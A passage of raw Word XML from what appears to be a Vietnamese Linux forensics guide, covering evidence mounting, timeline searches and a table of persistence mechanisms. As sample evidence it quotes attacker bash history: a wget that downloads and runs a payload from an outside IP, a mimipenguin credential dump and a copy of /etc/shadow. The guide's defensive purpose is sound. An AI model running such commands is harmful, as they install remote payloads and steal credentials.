              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="784C647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Vị trí mã độc thường thả tệp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="06177E6C">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7BB33C19">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~/.bashrc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>~/.profile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64013F6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Lệnh chạy khi mở shell/đăng nhập.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CA186B1">
      <w:pPr>
        <w:pStyle w:val="3"/>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Mount ảnh chỉ đọc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559C9238">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60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> mount </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="67"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> ro,noexec,noatime,loop,offset=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="61"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>$((</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="45"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2048</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="45"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>512</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="61"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">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evidence.E01 /mnt/evidence/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C5B3F4">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Tìm tệp thay đổi trong khoảng thời gian:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD5EFF0">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60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> /mnt/evidence/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-newermt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>'2026-01-14 22:00:00'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">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-not</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-newermt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>'2026-01-14 23:00:00'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">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-type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> f </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="45"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">/dev/null </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="43"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>grep</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-v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>'/proc\|/sys\|/run'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4939A410">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Ví dụ phát hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38635C04">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39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>/tmp/.hidden_dir/backdoor.sh             NEW</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/etc/cron.d/system_maintenance           NEW</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/home/www-data/.ssh/authorized_keys      MODIFIED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD6F367">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Bash history có thể lộ chuỗi tấn công:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AD094B">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39"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>wget http://185.220.101.47/shell.elf -O /tmp/.s &amp;&amp; chmod +x /tmp/.s &amp;&amp; /tmp/.s &amp;</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./mimipenguin -d</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cat /etc/shadow &gt; /tmp/shadow_copy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4FE1DC">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Nếu history trên đĩa đã bị xóa, tìm chuỗi trong ảnh RAM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599F05D8">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60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>strings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> memory.raw </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="43"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>grep</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-A2</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-B2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="51"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>'bash_history\|history -c'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="43"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="73"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="60"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="DejaVu Sans Mono" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>head</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-40</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="62"/>
    <w:p w14:paraId="2046CC01">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="cơ-chế-persistence-trên-linux"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>12.2. Cơ chế persistence trên Linux</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2489"/>
        <w:gridCol w:w="7557"/>
      </w:tblGrid>
      <w:tr w14:paraId="6D9A1EA8">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F3DB00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Cơ chế</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3FEDCE4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Dấu hiệu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="52DCB433">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104FAB1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Cron Jobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C6A3B2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 xml:space="preserve">Mục mới trong </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>/etc/cron.d</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>/etc/crontab</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> hoặc </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>/var/spool/cron</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="65F70122">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4616BC9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systemd Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F33484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 xml:space="preserve">Tệp </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>.service</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> mới trong </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>/etc/systemd/system</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1485D217">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44CA91D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SSH Authorized Keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A0C026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 xml:space="preserve">Key được thêm vào </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>~/.ssh/authorized_keys</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="197CD328">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09ACE799">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/etc/ld.so.preload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="702CD80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Nạp shared library trước mọi chương trình, kỹ thuật rootkit nguy hiểm.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1A4F6D9F">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24148223">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.bashrc</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="39"/>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Liberation Sans" w:cs="Times New Roman"/>
                <w:color w:val="auto"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>.profile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="329BF2D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Lệnh độc hại chạy mỗi lần mở shell hoặc đăng nhập.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="25A94E8F">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764FBEE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SUID Binary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6720CB4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Tệp SUID do người dùng bất thường sở hữu, hỗ trợ leo thang quyền.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="39CE9235">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432D680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PAM Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="144697D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Thư viện PAM bị thay đổi để chấp nhận mật khẩu bất kỳ.</w:t>
